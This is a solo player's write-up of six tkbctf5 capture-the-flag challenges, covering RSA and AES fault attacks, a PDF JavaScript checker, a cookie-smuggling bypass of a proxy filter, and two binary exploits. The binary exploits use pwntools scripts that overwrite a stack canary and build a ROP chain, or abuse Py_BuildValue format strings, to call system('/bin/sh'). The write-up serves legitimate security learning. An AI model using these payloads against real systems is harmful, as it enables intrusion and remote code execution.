tkbctf5 challenge writeups

# tkbctf5 challenge writeups Writeup author: fsharp ## Introduction I had a little free time and played tkbctf5 alone (under my old CTFTime solo team name [fsharp_hk](https://ctftime.org/team/211704/)), achieving 59th place out of 185 teams. Out of all challenges, I managed to solve 2 crypto, 1 reversing, 1 web exploitation and 2 binary exploitation challenges. ## Cryptography ### Single Hint RSA (96 pts, 111 solves) Author: yu212 We are given two files. The first one (`chall.py`) is a script that generates an RSA ciphertext from the flag: ```python import os from math import gcd from Crypto.Util.number import getPrime, bytes_to_long e = 11 flag = os.environ.get("FLAG", f"tkbctf{{{"dummy"*24}}}") flag = flag.removeprefix("tkbctf{").removesuffix("}").encode() assert len(flag) == 120 m = bytes_to_long(flag) p = getPrime(512) q = getPrime(512) assert gcd((p - 1) * (q - 1), e) == 1 n = p * q c = pow(m, e, n) hint1 = n % m print(f"{n=}") print(f"{e=}") print(f"{c=}") print(f"{hint1=}") ``` The second one is the output (`output.txt`): ``` n=106355772659701345964318417143394651063207428456215453439002897507959529597434886809900091569966425277511938767801980714938398649158388112317710373391834663525304231863666383091470134532442609738641279822679588058405512137402630292338680201169977752096539561076464502681405533276738762606253695333486635300117 e=11 c=57709889892302481730604978456569407865866089984321485829668848041279746593625646867358726055884587571542026961018063222927783667255209992837359953872022080880950318593445249622351520650827684714014441718458985647744543454058728562449684598363921005049148443778614680659575826505490809066816806157858025523873 hint1=54090058252804218553770902127609841718548664220987085177964232538368049188447317574459229022955503639171581148196516877285398714054794498098761794789311951957865082652646501644947370300536353612069166697135782197061383589516041765932064632491262789467798239447500141545602675069866142902 ``` Since `(n - hint1) % m == 0`, we can get an equation `k * m = n - hint1` for an unknown integer `k`. As the flag is 120 characters, `m` should be at most 120 x 8 = 960 bits. Since `n - hint1` is 1024 bits, `k` is around 1024 - 960 = 64 bits. Given how small `k` is, it's feasible to factorize `n - hint1` to recover it so that `m` (the flag) can be calculated from `(n - hint1) // k`. However, there's a quicker way that doesn't involve factorization. The ciphertext `c` is `pow(m, e, n)`. Calculating `pow(n - hint1, e, n)` is the same as `pow(k * m, e, n)`, and `m` can be cancelled out by multiplying that with `pow(c, -1, n)`, which gives us `pow(k, e, n)`. As `e = 11`, `pow(k, e)`'s bit length is only roughly 11 x 64 = 704 bits, which isn't as big as n's bit length (1024). This means we now have the 11th power of `k`, and we can just take its 11th root to recover `k`. Alternatively, we can just take the greatest common divisor of `k ** 11` and `n - hint1`. ```python from math import gcd from Crypto.Util.number import long_to_bytes n = 106355772659701345964318417143394651063207428456215453439002897507959529597434886809900091569966425277511938767801980714938398649158388112317710373391834663525304231863666383091470134532442609738641279822679588058405512137402630292338680201169977752096539561076464502681405533276738762606253695333486635300117 e = 11 c = 57709889892302481730604978456569407865866089984321485829668848041279746593625646867358726055884587571542026961018063222927783667255209992837359953872022080880950318593445249622351520650827684714014441718458985647744543454058728562449684598363921005049148443778614680659575826505490809066816806157858025523873 hint1 = 54090058252804218553770902127609841718548664220987085177964232538368049188447317574459229022955503639171581148196516877285398714054794498098761794789311951957865082652646501644947370300536353612069166697135782197061383589516041765932064632491262789467798239447500141545602675069866142902 m_mul = n - hint1 # k * m == n - hint1 k_pow_11 = pow(m_mul, e, n) * pow(c, -1, n) % n # k ** 11 == k_pow_11 k = gcd(m_mul, k_pow_11) m = m_mul // k flag = "tkbctf{" + long_to_bytes(m).decode() + '}' print(flag) # tkbctf{I_do_understand_the_risk_of_leaking_plaintext_by_giving_additional_information_in_the_RSA_and_really_want_to_provide_n%m} ``` ### Faulty AES (124 pts, 61 solves) Author: yu212 We're given a Python implementation of AES from `https://github.com/boppreh/aes/blob/master/aes.py` and the following `server.py` script: ```python import inspect import os import hashlib # https://github.com/boppreh/aes/blob/master/aes.py import aes flag = os.environ.get("FLAG", "tkbctf{dummy}") hash_val = hashlib.sha256(flag.encode()).digest() key, msg = hash_val[:16], hash_val[16:] pos = int(input("pos: ")) source = bytearray(inspect.getsource(aes), "utf-8") source[pos // 8] ^= 1 << (pos % 8) exec(bytes(source), aes.__dict__) print("ct:", aes.AES(key).encrypt_block(msg).hex()) if bytes.fromhex(input("hash: ")) == hash_val: print(flag) else: print("wrong") ``` The goal is to recover both the AES encryption key (`key`) and the plaintext (`msg`) through injecting a 'fault' into (i.e. toggling 1 bit of) the AES implementation script. From what I understand, fault attacks normally involve toggling bits of various stages in AES and not directly on the AES implementation script, so the premise of this challenge was new to me. After brainstorming a little, I noticed I could do some really useful things for certain bit flips. The `sub_bytes()`, `add_round_key()` and `mix_columns()` parts of AES encryption can be disabled by changing the iteration range of the outer loop from `4` to `0` (XOR `1 << 2`): ```python def <part_name>(s): for i in range(0): # <-- originally 'for i in range(4):' <some operations here> ``` The part that's most worth disabling here is `add_round_key()`, which makes AES encryption independent of the key and allows the plaintext to be recovered: ```python from pwn import * import aes context.log_level = "error" source = bytearray(inspect.getsource(aes), "utf-8") # Get the ciphertext with add_round_key disabled pos = 31986 chall = remote("35.194.108.145", 54140) _ = chall.sendlineafter(b"pos: ", str(pos).encode()) _ = chall.recvuntil(b"ct: ") ct = bytes.fromhex(chall.recvuntil(b'\n', drop = True).decode()) # b'\xc7\xdb~\x11\x1a\x86\xf8\x80\xff$h\xa6h\x99D\xb4' chall.close() source[pos // 8] ^= 1 << (pos % 8) exec(bytes(source), aes.__dict__) msg = aes.AES(b"doesn't matter!!").decrypt_block(ct) # b's\x94ww\xba\x14\xd8\x8b\xfe:2%\xd0\xc2\xf4\xc2' ``` Another useful bit flip is to get rid of all AES rounds by changing the number of rounds for a 16-byte AES key from `10` to `00` (XOR (1 << 0)): ```python class AES: # ... rounds_by_key_size = {16: 00, 24: 12, 32: 14} # <-- rounds_by_key_size[16] was originally 10 def __init__(self, master_key): # ... assert len(master_key) in AES.rounds_by_key_size self.n_rounds = AES.rounds_by_key_size[len(master_key)] self._key_matrices = self._expand_key(master_key) # ... ``` Zero-round AES looks like this: ```python def encrypt_block(self, plaintext): # ... assert len(plaintext) == 16 plain_state = bytes2matrix(plaintext) add_round_key(plain_state, self._key_matrices[0]) # No more rounds!!! # for i in range(1, self.n_rounds): # sub_bytes(plain_state) # shift_rows(plain_state) # mix_columns(plain_state) # add_round_key(plain_state, self._key_matrices[i]) sub_bytes(plain_state) shift_rows(plain_state) add_round_key(plain_state, self._key_matrices[-1]) # same as [0] in this case return matrix2bytes(plain_state) ``` What's crucial here is that `self._key_matrices[0]` is the AES key itself and the ciphertext generated doesn't depend on any round key, which simplifies things a lot. We can use the recovered `msg` and the zero-round AES ciphertext to significantly reduce the number of AES key candidates (WARNING: ***very*** ugly code ahead...): ```python from pwn import * import aes # Get the ciphertext with with no AES rounds pos = 55080 chall = remote("35.194.108.145", 54140) _ = chall.sendlineafter(b"pos: ", str(pos).encode()) _ = chall.recvuntil(b"ct: ") zero_round_ct = bytes.fromhex(chall.recvuntil(b'\n', drop = True).decode()) # b"[A\xec\xaeF\xfe\xedmi2\xb0T\xa5y\x17'" chall.close() # Solve for AES key candidates shift_row_indices = [0, 13, 10, 7, 4, 1, 14, 11, 8, 5, 2, 15, 12, 9, 6, 3] #for (i, j) in enumerate(shift_row_indices): # assert aes.s_box[msg[i] ^ key[i]] == zero_round_ct[j] ^ key[j] key_candidates = {} for (i, j) in enumerate(shift_row_indices): if i == j: key_candidates[i] = [] for k in range(256): if (aes.s_box[msg[i] ^ k] == zero_round_ct[i] ^ k) or (msg[i] ^ k == aes.inv_s_box[zero_round_ct[i] ^ k]): key_candidates[i].append(k) else: key_candidates[(i, j)] = [] for k0 in range(256): for k1 in range(256): if aes.s_box[msg[i] ^ k0] == zero_round_ct[j] ^ k1: key_candidates[(i, j)].append((k0, k1)) key_0, key_4, key_8, key_12 = key_candidates[0], key_candidates[4], key_candidates[8], key_candidates[12] key_2_10 = key_candidates[(2, 10)] key_6_14 = key_candidates[(6, 14)] key_1_5_9_13 = [] key_3_7_11_15 = [] for (k_1, k_13) in key_candidates[(1, 13)]: k_5 = None k_9 = None for (a, b) in key_candidates[(5, 1)]: if b == k_1: k_5 = a break for (a, b) in key_candidates[(9, 5)]: if b == k_5: k_9 = a break if (k_13, k_9) not in key_candidates[(13, 9)]: continue key_1_5_9_13.append((k_1, k_5, k_9, k_13)) for (k_3, k_7) in key_candidates[(3, 7)]: k_11 = None k_15 = None for (a, b) in key_candidates[(7, 11)]: if a == k_7: k_11 = b break for (a, b) in key_candidates[(11, 15)]: if a == k_11: k_15 = b break if (k_15, k_3) not in key_candidates[(15, 3)]: continue key_3_7_11_15.append((k_3, k_7, k_11, k_15)) # At this point, we know key[0], key[12] and key[1, 5, 9, 13] k0 = key_0[0] # 22 k12 = key_12[0] # 210 k1, k5, k9, k13 = key_1_5_9_13[0] # (9, 192, 235, 39) # We still have 2 key[4], 2 key[8], 256 key[2, 10], 256 key[6, 14] and 2 key[3, 7, 11, 15] possibilities, which makes up 524288 key candidates ``` To figure out the correct key, we can now just bruteforce key candidates to see which one decrypts the normal AES ciphertext into `msg`: ```python # Get the ciphertext from normal AES encryption pos = 32512 chall = remote("35.194.108.145", 54140) _ = chall.sendlineafter(b"pos: ", str(pos).encode()) _ = chall.recvuntil(b"ct: ") normal_ct = bytes.fromhex(chall.recvuntil(b'\n', drop = True).decode()) # b'H\r\xfai\xbe\xcc\x99\xc2\x1d7"\x91\x12\x14\xaa\x96' chall.close() # Recover the correct AES key try: for k4 in key_4: for k8 in key_8: for (k2, k10) in key_2_10: for (k6, k14) in key_6_14: for (k3, k7, k11, k15) in key_3_7_11_15: key = bytes([k0, k1, k2, k3, k4, k5, k6, k7, k8, k9, k10, k11, k12, k13, k14, k15]) if aes.AES(key).encrypt_block(msg) == normal_ct: raise Exception() except: pass # key = b"\x16\t\xdd\xfe5\xc0#\xcap\xeb\x1c\xd7\xd2'\x18\xae" # Submit the key and message to get the flag chall = remote("35.194.108.145", 54140) _ = chall.sendlineafter(b"pos: ", str(pos).encode()) _ = chall.sendlineafter(b"hash: ", (key.hex() + msg.hex()).encode()) flag = chall.recvuntil(b'\n', drop = True).decode() chall.close() print(flag) # tkbctf{AES_is_n0t_s3cur3_ag4inst_ch0s3n_bit_f1ip_4ttacks!} ``` ## Reversing ### README.pdf (88 pts, 135 solves) Author: arata-nvm We're given a PDF file that acts as an interactive flag checker when opened in a web browser: ![image](https://hackmd.io/_uploads/S1EUhAmcbl.png) PDFs are composed of various kinds of data streams, which includes JavaScript used to make them interactive. To look at how the flag checker's implemented, I used a PDF stream decoding tool ([PDF Stream Dumper](https://sandsprite.com/blogs/index.php?uid=7&pid=57)) and found a stream containing JavaScript: ![image](https://hackmd.io/_uploads/H1Cm607cZx.png) The top of the stream contains the flag checking function, while the remainder of the stream (not shown in the screenshot) is responsible for placing the buttons and implementing their logic. The flag can be recovered by reversing a XOR cipher: ```python expected = [46, 49, 56, 57, 46, 60, 33, 16, 110, 44, 110, 9, 57, 40, 107, 42, 46, 5, 107, 52, 5, 10, 30, 28, 39] k = 90 flag = bytes([e ^ k for e in expected]).decode() print(flag) # tkbctf{J4v4Scr1pt_1n_PDF} ``` ![image](https://hackmd.io/_uploads/S1ALRRQ5bx.png) ## Web exploitation ### Patisserie (107 pts, 85 solves) Author: kq5y We're given the source code of a website used for sharing pastry recipes. The website has an endpoint that shows the flag when the user provides an `is_admin` HTTP cookie with a value of `1`: ```javascript app.get("/admin", (req, res) => { if (req.cookies.is_admin === "1") { return res.send(`<!DOCTYPE html><html><head><meta charset="utf-8"><title>Admin - Patisserie</title>${PAGE_STYLE}</head> <body> ${nav("Admin")} <div class="container"> <h1>Admin Panel</h1> <div class="card"> <h2>Secret Recipe</h2> <p>${FLAG}</p> </div> </div> </body></html>`); } // ... }); ``` However, the catch is a proxy that tries to block HTTP requests containing cookies with the string `admin`: ```python import os import http.client import urllib.parse from flask import Flask, Response, request from http.cookies import SimpleCookie app = Flask(__name__) BACKEND_URL = os.environ.get("BACKEND_URL", "http://app:3000") MAX_COOKIES = 16 def parse_cookie_header(raw: str) -> dict[str, str]: sc = SimpleCookie() try: sc.load(raw) except Exception: return {} return {key: morsel.value for key, morsel in sc.items()} def check_cookies(cookie_header: str) -> str | None: cookie_header = cookie_header.strip() if not cookie_header: return None cookies = parse_cookie_header(cookie_header) if not cookies: return "malformed cookie" if len(cookies) > MAX_COOKIES: return "too many cookies" for name in cookies: if "admin" in name.lower(): return "blocked cookie" return None # If check_cookies() returns a string, the HTTP request is blocked # ... ``` So we need to somehow specify an `is_admin` cookie without getting blocked. From this, I felt that `SimpleCookie()` (the Python class used to check the cookies) might have a parser differential. After doing some digging, I found [this article from arxenix](https://blog.ankursundara.com/cookie-bugs/): ![image](https://hackmd.io/_uploads/S11ZEkN9Zg.png) The article later on mentions that `SimpleCookie()` is vulnerable to this cookie smuggling payload as well. So, to solve this challenge, I can just take the payload and add the desired `is_admin` cookie in there: `curl -H "Cookie: user=...; RENDER_TEXT=\"hello world; is_admin=1; ASDF=end\";" http://35.194.108.145:11198/admin` Flag: `tkbctf{qu0t3d_c00k13_smuggl1ng_p4rs3r_d1ff_7d3f8a2b}` ## Binary exploitation ### Stack BOF (142 pts, 45 solves) Author: keymoon The program's source code is: ```c // gcc -Wl,-z,now,-z,relro main.c -o stack-bof #include <stdio.h> #include <stdint.h> int main() { char buf[8]; uint64_t* dest = 0; printf("printf: %p\n", printf); read(0, &dest, 8); read(0, dest, 8); gets(buf); } __attribute__((constructor)) void setup() { setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); } ``` The program has all protections enabled. We're given a libc address leak (the address of `printf()`), then we're asked for an address to write to and 8 bytes to write there (i.e. a write-what-where gadget) before `gets(buf)` is called. Without the write-what-where gadget, this challenge will only be solvable by bruteforcing the stack canary, and actually doing that will probably get me disqualified from the CTF. But I remember reading [a pwn challenge writeup from c0nrad / Sloppy Joe Pirates](https://gist.github.com/c0nrad/8aa6300c6035ce640cb0497106eb3377) that involves overwriting the stack canary when a libc address is leaked and bypasses the stack smashing protection. Apparently, the address where the canary's stored is always at a constant offset from the libc base address. So, I can use the gadget to perform this technique before writing a ROP chain to spawn a shell: ```python from pwn import * chall = remote("35.194.108.145", 26639) _ = chall.recvuntil(b"printf: ") printf_addr = eval(chall.recvuntil(b'\n', drop = True).decode()) libc_addr = printf_addr - 0x60100 canary_addr = printf_addr - 0x62998 new_rbp = libc_addr + 0x205200 # Point RBP to a writable section within libc new_canary = b'a' * 8 pop_rdi_ret = p64(libc_addr + 0x10f78b) ret = p64(libc_addr + 0x2882f) bin_sh_str = p64(libc_addr + 1881135) system_addr = p64(libc_addr + 362320) # Overwrite the canary with something we know chall.send(p64(canary_addr)) chall.send(new_canary) # Write a ROP chain chall.sendline(b'a' * 8 + new_canary + p64(new_rbp) + pop_rdi_ret + bin_sh_str + ret + system_addr) chall.interactive() # cat /flag* --> tkbctf{*** stack smashing not detected ***} ``` ### PyFSB (159 pts, 35 solves) Author: iwancof We have the following Python script that's run whenever the user connects to the challenge: ```python #!/usr/bin/env -S python3 -u print("welcome to fsb service") import fsb while True: print(fsb.pwn()) ``` `fsb` is a custom Python module, and its C source code is given as follows: ```c #include <Python.h> static PyObject *pwn(PyObject *self, PyObject *args) { char request[0x100]; if (fgets(request, 0x100, stdin) == NULL) return NULL; request[strcspn(request, "\n")] = 0; return Py_BuildValue(request); } static PyMethodDef FsbMethods[] = {{"pwn", pwn, METH_VARARGS, NULL}, {NULL, NULL, 0, NULL}}; static struct PyModuleDef fsb_mod = {PyModuleDef_HEAD_INIT, "fsb", NULL, -1, FsbMethods}; PyMODINIT_FUNC PyInit_fsb(void) { return PyModule_Create(&fsb_mod); } ``` According to the [Python documentation](https://docs.python.org/3/c-api/arg.html#c.Py_BuildValue), `Py_BuildValue()` takes a format string as its first argument and returns a Python object based on that. It has some similarities with the C [`printf()`](https://en.cppreference.com/w/c/io/fprintf) function. To get a shell, ideally I can choose which function or address to call and what arguments to pass to it. Luckily, the `O&` format specifier does exactly that: ![image](https://hackmd.io/_uploads/B14Sim49Wl.png) Let's take a look at a real-world example to see what a converter function can look like. Doing a Google search, I stumbled upon [this code snippet from the Robot Operating System](https://docs.ros.org/en/melodic/api/tf2_py/html/tf2__py_8cpp_source.html): ```c static int rosduration_converter(PyObject *obj, ros::Duration *rt) { PyObject *tsr = PyObject_CallMethod(obj, (char*)"to_sec", NULL); if (tsr == NULL) { PyErr_SetString(PyExc_TypeError, "time must have a to_sec method, e.g. rospy.Time or rospy.Duration"); return 0; } else { (*rt).fromSec(PyFloat_AsDouble(tsr)); Py_DECREF(tsr); return 1; } } static int BufferCore_init(PyObject *self, PyObject *args, PyObject *kw) { ros::Duration cache_time; cache_time.fromSec(tf2::BufferCore::DEFAULT_CACHE_TIME); if (!PyArg_ParseTuple(args, "|O&", rosduration_converter, &cache_time)) return -1; ((buffer_core_t*)self)->bc = new tf2::BufferCore(cache_time); return 0; } ``` It seems that we have control over two arguments (the `rdi` and `rsi` registers) passed into the converter function, which is great! But how do we know what to call? In many `printf()` format string buffer pwn challenges, libc addresses need to be leaked (e.g. with the `%p` pointer format specifier), and `Py_BuildValue()` does have a format specifier for that too: ![image](https://hackmd.io/_uploads/S1n4aXVqbl.png) If all goes well, I should be able to leak a libc address using the `K` format specifier, then call `system("/bin/sh")` using the `O&` format specifier. Sending `'K' * 254` to the server, I get a tuple of 254 unsigned long longs, and the 201st value is a libc address. With the libc base address known, I can also calculate where `system()` and `"/bin/sh"` lie within libc to spawn a shell: ```python from pwn import * chall = remote("35.194.108.145", 13840) _ = chall.recvuntil(b'\n') chall.sendline(b'K' * 254) leaked = eval(chall.recvuntil(b'\n', drop = True).decode()) libc_addr = leaked[200] - 0x2a1ca bin_sh_str = libc_addr + 1881135 system_addr = libc_addr + 362320 chall.sendline(b'K' * 12 + b'O&' + b'\x00' * 2 + b'a' * 40 + p64(system_addr) + p64(bin_sh_str)) chall.interactive() # cat flag* --> tkbctf{n3w_463_0f_f5b-805a5dd8f03016053bf77528ec56265b7c593e6612d54a458258e5e2eba51ab0} ```